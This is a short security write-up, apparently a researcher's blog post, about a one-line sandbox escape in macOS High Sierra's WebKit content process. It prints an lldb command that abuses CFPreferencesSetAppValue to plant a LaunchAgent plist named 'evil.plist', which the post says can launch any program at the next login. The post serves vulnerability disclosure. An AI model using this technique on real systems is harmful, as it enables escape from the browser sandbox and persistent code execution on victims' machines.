I am writing about a dead simple and reliable sandbox escape exploit which only have one line of code. Yeah I am sure it’s an exploit, not just PoC. It has nothing to do with iOS so please stop asking me anything about that.

The bug was refactored (and killed) before beta release of Mojave. The latest vulnerable version is macOS High Sierra 10.13.6 (17G65).

Since it’s part of a browser exploit chain you’ll need a renderer exploit to gain shellcode execution first. If not, disable SIP so you can debug, attach lldb to a running com.apple.WebKit.WebContent.xpc and use the following command:

po CFPreferencesSetAppValue(@"Label", @"You know what should be put here", [(id)NSHomeDirectory() stringByAppendingPathComponent:@"Library/LaunchAgents/evil.plist"])

This line will generate a new plist under ~/Library/LaunchAgents . With the proper arguments you can launch a Calculator or anything you like after re-logging into system.